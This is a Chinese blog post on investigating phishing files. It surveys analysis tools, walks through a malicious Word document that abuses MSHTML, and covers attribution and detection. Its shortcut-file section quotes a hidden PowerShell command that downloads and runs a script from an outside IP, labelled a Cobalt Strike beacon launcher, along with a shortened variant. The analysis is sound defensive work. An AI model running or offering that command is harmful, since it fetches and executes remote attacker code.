首页 > 其他分享 >钓鱼文件应急溯源:方法篇

钓鱼文件应急溯源:方法篇

时间:2023-09-25 10:55:32浏览次数:65  
标签:分析 文件 www 钓鱼 恶意软件 https 应急 com 溯源

内容概览

wKg0C2UCozqAAY4AABsxd19Dmk459.png

背景

如今,恶意软件分析已是信息安全领域的一个整体产业:

发布保护产品的反病毒引擎实验室,高度专业化的专家小组,甚至恶意软件编写者本身也参与其中,他们争夺一个潜在的客户--"受害者"。

  • 静态恶意软件分析

静态恶意软件分析在不主动运行恶意软件代码的情况下查找可能损害系统的文件,使其成为暴露恶意库或打包文件的安全工具。静态恶意软件分析可以发现有关恶意软件性质的线索,例如文件名、哈希、IP 地址、域和文件头数据。可以使用各种工具(例如网络分析器)观察恶意软件。

  • 动态恶意软件分析

动态恶意软件分析使用沙盒,沙盒是一个安全、隔离的虚拟环境,您可以在其中运行可疑的危险代码。安全专业人员可以密切监视沙箱中的恶意软件,而不必担心感染系统或网络的其余部分,从而使他们能够收集有关恶意软件的更多信息。

  • 混合恶意软件分析

混合恶意软件分析结合了静态和动态技术。例如,如果恶意代码对计算机的内存进行更改,则动态分析可以检测到该活动。然后,静态分析可以准确确定进行了哪些更改。

  • NetLimiter

官网:https://www.netlimiter.com/

可通过此工具监测程序的网络通讯信息,以方便进一步分析

wKg0C2UCo0aAKhQuAAC2hmH5gY049.png

  • CurrPorts

官网:https://www.nirsoft.net/utils/cports.html

可通过此工具显示本地计算机上所有当前打开的TCP/IP和UDP端口的列表。对于列表中的每个端口,还显示打开该端口的进程的信息,包括进程名称、进程的完整路径、进程的版本信息(产品名称、文件描述等)、进程的创建时间以及创建该进程的用户。此外,CurrPorts允许你关闭不需要的TCP连接,杀死打开端口的进程,并将TCP/UDP端口信息保存到HTML文件、XML文件或以制表符分隔的文本文件中。

wKg0C2UCo02AVjitAABzJDJwFB4808.png

  • TeaPot

可通过此工具监测目标系统的DNS解析,可有效应用于对APT远控木马的检测。

wKg0C2UCo1SACw3fAAD3jR23tQ8590.png

  • HTTPDebuger

官网:https://www.httpdebugger.com/

可通过此攻击http与https数据

wKg0C2UCo12AUQuNAACszVAwzY045.png

  • DiffView

官网:https://www.adlice.com/diffview/

可通过此工具追踪一个程序在你系统上所做的修改或一些操作进行监控

wKg0C2UCo2WAcWRPAABhS1GmNJ0225.png

  • 火绒剑

官网:https://www.huorong.cn/

可通过此工具在如下图所展示的角度分析程序运行后做了什么,以分析是否为恶意程序以及进行辅助分析工作

wKg0C2UCo2yAKFo4AAA4n2TFENc122.png

wKg0C2UCo3OAeRtBAAEjDFs8B6w824.png

  • Comodo

可通过此工具的HIPS与防火墙功能监测程序运行后做了什么,以进行分析

https://www.comodo.com/home/internet-security/free-internet-security.php

wKg0C2UCo3qAM9pzAACNkhDgLBc995.png

  • GDA 与Frida

http://www.gda.wiki:9090/

https://frida.re/

通过GDA与Frida来分析APK是否存在恶意行为

wKg0C2UCo4GAaXycAACF0WwcYCg972.png

wKg0C2UCo4eAH2HAAACRrNFYh4533.png

  • x64dbg

https://x64dbg.com/

可通过此工具深入分析程序的执行情况以及运行原理

wKg0C2UCo4AW4mAAC5nllKqM968.png

一个恶意软件分析思路图展示,如下图展示了三个编码级别

wKg0C2UCo9OAMYmAAABks0zGfmw554.png

恶意软件作者:使用高级语言编写恶意程序

计算机:CPU识别代码进行执行

恶意软件分析人员:通过反编译手段进行分析

针对软件的网络信息常针对底层运行原理,通过拦截发布函数进行分析

wKg0C2UCo9yAXr5BAABykrkjslQ617.png

wKg0C2UCoaACKR2AABZMnrWq9w912.png

WSPSend函数在一个连接的套接字上发送数据。

WSPSendTo函数使用重叠的I/O将数据发送到一个特定的目的地。

WSPRecv函数在一个套接字上接收数据。

WSPRecvFrom函数接收一个数据报并存储源地址。

打开Word 发现有下载连接

wKg0C2UCoANmL7AAAufZqj2kI216.png

模拟恶意行为打开了计算器

wKg0C2UCoWAXWDvAAAnzfq980E217.png

wKg0C2UCoyAH1ZXAABdcmSaO4E299.png

该漏洞存在于MSHTML,即Internet Explorer的引擎。虽然现在很少有人使用IE(甚至微软也强烈建议改用其较新的浏览器Edge),但这个旧的浏览器仍然是现代操作系统的一个组成部分,而且其他一些程序也使用其引擎来处理网络内容。特别是,微软的Office应用程序,如Word和PowerPoint,都依赖它。

钓鱼邮件示例

wKg0C2UCpASAHB12AABapSvzKGU454.png

自该漏洞发布以来,安全研究人员在Twitter上警告说,尽管微软Office的 “保护视图 ”功能会阻止该漏洞,但这是多么危险。当Office打开一个文档时,它会检查它是否被标记为 “网络标记”(MoTW),这意味着它来自于互联网。如果这个标签存在,微软将以只读模式打开文档,有效地阻止了该漏洞,除非用户点击 “启用编辑 ”按钮。

但历史表明,许多用户忽略了这一警告,还是点击了 "启用编辑 "按钮。

但还有有许多方法可以使文件不收到MoTW标志,从而有效地否定了这种防御。

wKg0C2UCpAuAe6TAAC7EspfJtM677.png

  • 网络分析示例

发起程序-

WINWORD.EXE *64位
请求地址-

http://192.168.86.144/
http://192.168.86.144/word.cab

解析:cab是windows的压缩格式

wKg0C2UCpBOAAnAACszVAwzY204.png

  • 行为监控分析示例

正常:就是打开一个word文档

可疑:调用了控制面板程序control.exe

并通过控制面板执行临时文件夹下名为msword.inf配置文件,之后通过运行cmd程序打开计算器程序calc.exe(这里代指恶意程序)

wKg0C2UCpBqAX0yYAACy0bR8oQU988.png

  • 解包查看

wKg0C2UCpCWASqn1AADlwxzrz2w111.png

wKg0C2UCpCuAPWqDAAEhQTbZ1Gg436.png

结合之前网络分析访问此地址后跳转下载可疑文件

  • 下载分析

wKg0C2UCpDOAaFCoAABuP491kv4431.png

wKg0C2UCpECARy4iAABGHprY5UY440.png

通过control(控制面板)程序运行msword.inf脚本

INF文件中包含硬件设备的信息或脚本以控制硬件操作。

  • 解析

wKg0C2UCpEiAH5afAABMcu2mAl4626.png

看到了计算器相关内容(calc.exe 这里代指恶意程序)

  • 反汇编定位

wKg0C2UCpEAAYfZAADRWQyZQn0617.png

关键函数运行完毕,恶意程序已成功加载

wKg0C2UCpFaAawSxAACxyeLetA860.png

进入查看(已加载恶意配置文件)

wKg0C2UCpF2AY0TuAADg88tJ1w099.png

ShellExecuteExW函数(可通常此函数执行外部程序或打开文件)

wKg0C2UCpGWAeYGvAADAxenDwq8165.png

rundll32.exe(rundll32.exe用于在内存中运行DLL文件,

它们会在应用程序中被使用,可用于在内存中执行恶意dll)

wKg0C2UCpGuACTvAACiY3WsNCM021.png

栈回溯

执行参数

溯源

常根据分析的数据如IP、MD5、签名等等通过一些方法深入定位制作者

常用的一些工具

  • 埃文

https://www.ipplus360.com/

可通过此工具进行IP定位

  • BestTrace

https://www.ipip.net/product/client.html

IP归属快速查询

  • 备案、Whois、威胁情报查询系统

https://beian.miit.gov.cn/#/Integrated/index

https://whois.aliyun.com/

https://ti.qianxin.com/

https://s.threatbook.com/

https://tix.qq.com/

https://ti.sangfor.com.cn/analysis-platform

判断

  • 后缀名与显示的logo

wKg0C2UCpHiAWZOaAACBAeosvbI241.png

如图所示显示的是常见pdf logo但实际是可执行文件

  • 文件类型

wKg0C2UCpIGAN4kcAACGGuKnsek601.png

如图所示,通过一些方法使其后缀名看起来正常,但实际是可执行文件,此类可通过属性文件类型信息查看

  • hash

例如,假设你有20个来源不明的文件,你能够使用它们的MD5值在virscan、Virustotal之类的查杀网站进行对比来识别它们的安全度

https://www.virscan.org/

https://www.virustotal.com/

wKg0C2UCpIqAFYfWAABQja2oo266.png

wKg0C2UCpJKAYrQAAAvJEQZj4g394.png

  • 时间戳

wKg0C2UCpJqAH7wQAABe5Jyll6Q722.png

wKg0C2UCpKOAOMTlAABQ0RzElgM913.png

如图所示 编译日期与版本信息差别过大

  • 邮件信息

wKg0C2UCpK6AJX7wAACHhXSeUxI677.png

发件人与所属单位对比

  • 打开判断

wKg0C2UCpLWAH5ejAADQKzvyBg460.png

执行恶意宏代码,在TEMP目录释放XLS文件

然后通过WMIC启动恶意XLS文件

  • 专业工具

https://github.com/emalderson/ThePhish

钓鱼邮件分析系统

wKg0C2UCpLyAfUSSAACr2DUczPk018.png

  • 扫描

http://www.starwoodd.net/

wKg0C2UCpMOAWZ2bAACT9MJBhMw582.png

  • 代码分析

wKg0C2UCpMmAXBB9AAB5hy3fik762.png

分析其具体行为与作用对比

  • 快捷方式

wKg0C2UCpNKAfoMSAABT0BDfiU740.png

wKg0C2UCpNqAJN9zAAAsbfMTY8861.png

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://120.48.85.228/favicon’))”

常见的cs上线命令

wKg0C2UHQaATkUmAABj7lFl9QM176.jpg

powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(‘’)

powershell上线命令可以简化,删除了两个括号和两个双引号

  • 快捷方式

网上找的样本进行分析,如下图所示,解包内容存在欺骗诱导行为

wKg0C2UCpUOAai7RAADjtqMdF3k591.png

wKg0C2UCpVWAQtePAADM51FXPVE648.png

  • 标题诱导

查看属性与解混混淆发现为恶意程序

wKg0C2UCpVuAGoHRAAErr9pPmwY177.png

wKg0C2UCpWmAWcoHAADHTYKABpE234.png

wKg0C2UCpXSAfk7AACFYfU5sA637.png

  • 执行监控

打开文档后发现有外联与执行程序行为

wKg0C2UCpXyAcCzkAAC8DGYjCUM619.png

wKg0C2UCpYKACSR1AAC6gUvxvTs600.png

  • 属性查看

在PEstudio中检查样本的属性,恶意软件被打包,所有的字符串都被加密了

wKg0C2UCpYqAWs3eAADpknAlA8I598.png

  • 反编译逐步分析

wKg0C2UCpZGAVgV7AABfmtwT5EM947.png

获取进程的名称,接着解密一些字符串,并将其中的两个字符串连接起来创建 EXE 文件的名称。

wKg0C2UCpaOAcMQfAACPV9S5YQ248.png

防止恶意程序自我感染的过程中,恶意软件会将进程的完整路径与解析的应用程序进行比较。如果它们相同,恶意软件将返回并结束此功能

wKg0C2UCpamAXtswAAB08gwZk591.png

遍历信息

wKg0C2UCpaAfXCuAAE0hTbgpdA195.png

c2

wKg0C2UCpbeAZryyAADd358EcgY202.png

内容过多这里不展示了,下图是总结与查杀规则

wKg0C2UCpb2AWEcAAAEnyMS6Do539.png

查杀

  • 扫描查杀思路图

不同的环境不同的思路

wKg0C2UCpcWAHfZ6AACeMe8u8Y4701.png

  • 专业扫描工具

wKg0C2UCpcyAQQIhAACHbCkIhlw653.png

  • 弱点扫描

用户帐户控制 (UAC) 有助于防止恶意软件损坏电脑,并且有助于组织部署易于管理的桌面。 借助 UAC,应用和任务将始终在非管理员帐户的安全上下文中运行,除非管理员专门授予管理员级别的访问系统权限。 UAC 可阻止自动安装未经授权的应用并防止意外更改系统设置。

wKg0C2UCpdAWLk9AACCKpAdzB0224.png

总结

  • 对于文件

wKg0C2UCpeaAe3xJAACRsQ93HA179.png

  • 内存层防护与监控

针对攻击的多样化建议在内存层进行防护与监控,目前国内安芯网盾这方面看到过相关资料

wKg0C2UCpe2AY40kAADWjv9EE30836.png

标签:分析,文件,www,钓鱼,恶意软件,https,应急,com,溯源
From: https://www.cnblogs.com/SecIN/p/17727419.html

相关文章

  • AP5193 DC-DC恒流转换器 消防应急 灯汽车灯 应急日光灯太阳能灯驱动IC
    AP5193是一款PWM工作模式,高效率、外围简单、内置功率MOS管,适用于4.5-100V输入的高精度降压LED恒流驱动芯片。电流2.5A。AP5193可实现线性调光和PWM调光,线性调光脚有效电压范围0.55-2.6V.AP5193工作频率可以通过RT外部电阻编程来设定,同时内置抖频电路,可以降低对其他设备的E......
  • AP5193 DC-DC恒流转换器 消防应急 灯汽车灯 应急日光灯太阳能灯驱动IC
    AP5193是一款PWM工作模式,高效率、外围简单、内置功率MOS管,适用于4.5-100V输入的高精度降压LED恒流驱动芯片。电流2.5A。AP5193可实现线性调光和PWM调光,线性调光脚有效电压范围0.55-2.6V.AP5193工作频率可以通过RT外部电阻编程来设定,同时内置抖频电路,可以降低对其他设备的EM......
  • 红蓝对抗-溯源反制(3)
    AWVS的反制awvs10版本漏洞https://www.exploit-db.com/exploits/39755awvs14以下的版本漏洞触发2021年4月13日,安全研究人员RajvardhanAgarwal在推特公布了本周第⼀个远程代码执行(RCE)的0Day漏洞ChromiumV8JavaScript引擎远程代码执行Chromium版本的漏洞,可以构造然后执行sh......
  • 2023国家网络安全宣传周|邮件安全意识培训-钓鱼篇
    干货满满建议收藏反复阅读钓鱼邮件钓鱼邮件是指黑客伪装成同事、合作伙伴、朋友、家人等用户信任的人,通过发送电子邮件的方式,诱使用户回复邮件、点击嵌入邮件正文的恶意链接或者打开邮件附件以植入木马或间谍程序,进而窃取用户敏感数据、个人银行账户和密码等信息,或者在设备上执......
  • 个人如何预防钓鱼邮件
    个人PC预防钓鱼邮件的措施如下: 培养安全意识:了解钓鱼邮件的特征和常见手法,学习如何识别和应对钓鱼邮件。可以通过参加网络安全培训、阅读相关文章和参考安全机构的建议来提高自己的安全意识。 警惕邮件发送者:仔细检查邮件的发送者,特别是陌生的或不熟悉的发送者。注意检查发送......
  • 移动端劫持应急
    PC端访问正常,移动端访问出现异常,比如插入弹窗、嵌入式广告和跳转到第三方网站,将干扰用户的正常使用,对用户体验造成极大伤害。现象描述部分网站用户反馈,手机打开网站就会跳转到赌博网站。问题处理访问网站首页,抓取到了一条恶意js:http://js.zadovosnjppnywuz.com/caonima.js我们......
  • 视频汇聚平台EasyCVR如何完成多设备平台视频监控向应急中心播放的实现
    将各种智能分析和预防功能汇聚起来,并与省级视频和感知数据共享平台进行对接,以获取视频资源。通过整合雪亮工程、"天翼应急"视频和其他厅局资源,形成一个视频资源池,并集中提供给与应急业务相关的特殊场景监控,例如森林防火、地震、危化品大中小企业、无人机/单兵和应急指挥中心大楼。......
  • linux-应急响应-盖茨木MA
    0x00前言Linux盖茨木ma是一类有着丰富历史,隐藏手法巧妙,网络入侵行为显著的DDoS,主要恶意特点是具备了后门程序,DDoS入侵的能力,并且会替换常用的系统文件进行伪装。得名于其在变量函数的命名中,大量使用Gates这个单词。分析和清除盖茨的过程,可以发现有很多值得去学习和借鉴的地方。0x......
  • 捕捉短连接-应急响应
    0x00前言短连接(shortconnnection)是相对于长连接而言的概念,指的是在数据传送过程中,只在需要发送数据时,才去建立一个连接,数据发送完成后,则断开此连接,即每次连接只完成一项业务的发送。在系统维护中,一般很难去察觉,需要借助网络安全设备或者抓包分析,才能够去发现。0x01应急场景......
  • ARMS 助力极氪提效服务应急响应,为安全出行保驾护航
    作者:比扬01客户介绍与项目背景浙江极氪智能科技有限公司于2021年3月成立,2021年4月发布极氪品牌及旗下首款产品——极氪001。极氪是一家以智能化、数字化、数据驱动的智能出行科技公司,秉承用户型企业理念,聚焦智能电动出行前瞻技术的研发,构建科技生态圈与用户生态圈,以“共创......